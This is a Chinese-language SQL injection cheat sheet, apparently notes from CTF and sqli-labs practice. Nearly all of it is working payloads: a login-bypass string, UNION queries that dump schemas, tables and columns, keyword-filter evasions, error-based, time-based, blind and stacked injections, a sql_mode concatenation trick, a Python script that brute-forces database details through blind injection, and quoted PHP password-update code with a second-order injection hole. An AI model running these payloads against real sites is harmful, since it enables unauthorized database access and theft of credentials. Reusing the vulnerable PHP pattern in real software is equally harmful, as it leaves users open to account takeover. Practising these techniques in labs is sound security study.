SQLI汇总

各种姿势

闭合字符检测

' " ) ))

万能密码

username=' or 1=1#&password=1

爆库

union select 1,group_concat(table_schema),3 from information_schema.columns
union select 1,2,group_concat(schema_name) from information_schema.schemata--+
union select database();#

爆表

union select 1,group_concat(distinct table_name) from information_schema.columns where table_schema = 'DATABASENAME'

爆字段

union select 1,group_concat(distinct column_name),3 from information_schema.columns where table_name= 'TABLENAME' and table_schema= 'DATABASENAME'

关键字绕过

se/**/lect

sel<>ect

sElect

selselectect

sel ect 在空格被过滤的情况下

?username=' uniunionon selselectect 1,group_concat(distinct table_schema),3 frfromom inforormation_schema.columns#&password=' oorr '1'='1

报错注入

~可使用0x7e ASCII码替代,防止前面字母丢失

1 and updatexml(1,make_set(3,'~',(select group_concat(table_name) from information_schema.tables where table_schema=database())),1)#

1 and updatexml(1,make_set(3,'~',(select group_concat(column_name) from information_schema.columns where table_name="users")),1)#

view.php?no=1 and updatexml(1,make_set(3,'~',(select data from users)),1)#
and updatexml(1,concat(0x7e,(select distinct concat(0x7e,(select schema_name),0x7e) from admin limit 0,1),0x7e),1)

substr()+ascii()

正则匹配regexp()

and 1=(select 1 from information_schema.columns where table_name='users' and column_name regexp '^us[a-z]' limit 0,1;)%23

判断users表中是否有us**的列

ord()+mid()

and ORD(MID((SELECT IFNULL(CAST(username AS CHAR),0x20)FROM security.users ORDER BY id LIMIT 0,1),1,1))= 68%23

ord()求ascii码

mid()从字段中提取出指定字符

cast()将username转化为字符串

IFNULL(exp1,exp2)假如expr1不为NULL,则IFNULL()的返回值为expr1; 否则其返回值为expr2。IFNULL()的返回值是数字或是字符串,具体情况取决于其所使用的语境。

字符串

admin => 0x61646D696E (十六进制)

延时注入

and If(ascii(substr(database(),1,1))>100,1,sleep(5))--+

盲注

or ascii(substr(datebase(),1,1))>100#

布尔盲注

or left(datebase(),1)='s'#

堆叠注入

场景:数据库调用函数使用了mysqli_multi_query(),可以执行多条以 ; 分割的语句

-1';show tables#

sql-mode的利用

查看当前sql-mode

SELECT` `@@``GLOBAL``.sql_mode;
SELECT` `@@SESSION.sql_mode;

设置sql-mode

SET GLOBAL sql_mode = 'modes...';
SET SESSION sql_mode = 'modes...';

sql-mode常用值

后台逻辑

select $_POST[query] || flag from flag => *,1

通过修改sql-mode将||变为concatSELECT 1;set sql_mode=PIPES_AS_CONCAT;SELECT 1 || flag FROM Flag

sqli-lab刷题记录

1

id=-1%27 union select 1,group_concat(schema_name),3 from information_schema.schemata%23
id=-1%27 union select 1,group_concat(table_name),3 from information_schema.tables%23

5 爆破

exp

import requests
import re

url = "http://xxxx/?id=1"
payload = ''
flag_in = 'You are in'

for i in range(0, 9):
    payload = url + "%27 and left(version(),1)="+str(i)+"%23"
    r = requests.get(payload)
    if re.findall(flag_in, r.text):
        print("First number of version:"+str(i))

for j in range(0, 30):
    payload = url + "%27 and length(database())="+str(j)+"%23"
    q = requests.get(payload)
    if re.findall(flag_in, q.text):
        print("The length of database is:" + str(j))

二分比较大法

and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>80%23

regexp()

24 二次注入

修改密码部分的源码

if($pass==$re_pass)
{	
    $sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' ";
    $res = mysql_query($sql) or die('You tried to be smart, Try harder!!!! :( ');
    $row = mysql_affected_rows();
    echo '<font size="3" color="#FFFF00">';
    echo '<center>';
    if($row==1)
    {
        echo "Password successfully updated";

    }
    else
    {
        header('Location: failed.php');
        //echo 'You tried to be smart, Try harder!!!! :( ';
    }
}
else
{
    echo '<font size="5" color="#FFFF00"><center>';
    echo "Make sure New Password and Retype Password fields have same value";
    header('refresh:2, url=index.php');
}

创建用户名 admin'#,选择更改密码可以直接修改掉 admin 的密码

数据库特性

MySQL

mysql数据库的特性,当插入的数据超过数据库规定的长度时,数据库会将数据自动地截断进行插入,不会有任何的报错

sql-modeSTRICT_TRANS_TABLES可进行限制

MYSQL正则